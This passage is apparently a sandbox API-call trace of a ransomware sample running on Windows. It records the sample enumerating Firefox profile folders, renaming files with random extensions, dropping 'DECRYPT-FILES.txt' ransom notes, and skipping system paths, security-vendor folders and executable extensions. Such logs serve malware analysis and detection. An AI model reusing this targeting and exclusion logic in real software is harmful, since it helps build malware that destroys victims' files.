(in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0183.715] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0183.715] lstrlenA (lpString="DEBUGBREAK") returned 10 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0183.715] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0183.715] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0183.715] lstrlenA (lpString="DECODEPOINTER") returned 13 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0183.715] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0183.715] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0183.715] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0183.715] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0183.715] lstrlenA (lpString="DELETEATOM") returned 10 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0183.715] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0183.715] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0183.715] lstrlenA (lpString="DELETEFIBER") returned 11 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0183.715] lstrlenA (lpString="DELETEFILEA") returned 11 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0183.715] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0183.716] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0183.716] lstrlenA (lpString="DELETEFILEW") returned 11 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0183.716] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0183.716] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0183.716] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0183.716] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0183.716] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0183.716] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0183.716] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0183.716] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0183.716] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0183.716] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0183.716] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0183.716] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0183.716] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0183.716] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0183.716] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0183.716] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0183.716] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0183.716] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0183.717] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0183.717] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0183.717] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0183.717] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0183.717] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0183.717] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0183.717] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0183.717] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0183.717] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0183.717] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0183.717] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0183.717] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0183.717] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0183.717] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0183.717] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0183.717] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0183.717] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0183.718] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0183.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX") returned 108 [0183.718] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX.eIXc8K") returned 115 [0183.718] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.xev9dx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332.XEV9dX.eIXc8K" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332.xev9dx.eixc8k"), dwFlags=0x0) returned 1 [0183.719] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.719] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.719] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.719] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac396840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallTime20131025151332.XEV9dX", cAlternateFileName="INSTAL~1.XEV")) returned 0 [0183.719] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0183.720] CloseHandle (hObject=0x274) returned 1 [0183.720] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3706e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3706e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3706e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0183.720] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0183.720] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Profiles", cAlternateFileName="")) returned 1 [0183.720] lstrcmpW (lpString1="Profiles", lpString2=".") returned 1 [0183.720] lstrcmpW (lpString1="Profiles", lpString2="..") returned 1 [0183.720] lstrcatW (in: lpString1="Profiles", lpString2="\\" | out: lpString1="Profiles\\") returned="Profiles\\" [0183.720] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Program Files") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch=":\\Windows") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Games\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Tor Browser\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\ProgramData\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\All Users") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\IETldCache\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\Local Settings\\") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="\\AppData\\Local") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="AhnLab") returned 0x0 [0183.720] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0183.720] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0183.720] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.720] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\0a16c9.tmp") returned 82 [0183.720] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0183.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0183.735] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0183.735] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\DECRYPT-FILES.txt") returned 89 [0183.735] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.735] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0183.735] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*" [0183.735] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf038d120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf038d120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0183.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0183.735] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf038d120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf038d120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0183.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0183.735] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf038d120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf038d120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf038d120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0183.735] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0183.735] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0183.736] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0183.736] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.736] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0183.736] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0183.736] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0183.736] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0183.736] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 71 [0183.736] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.736] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0183.736] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\0a16c9.tmp" [0183.736] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.736] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.736] CloseHandle (hObject=0x0) returned 0 [0183.736] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.737] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0183.737] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0183.737] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad35ba00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad35ba00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="silmbjec.default", cAlternateFileName="SILMBJ~1.DEF")) returned 1 [0183.737] lstrcmpW (lpString1="silmbjec.default", lpString2=".") returned 1 [0183.737] lstrcmpW (lpString1="silmbjec.default", lpString2="..") returned 1 [0183.737] lstrcatW (in: lpString1="silmbjec.default", lpString2="\\" | out: lpString1="silmbjec.default\\") returned="silmbjec.default\\" [0183.737] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Program Files") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", 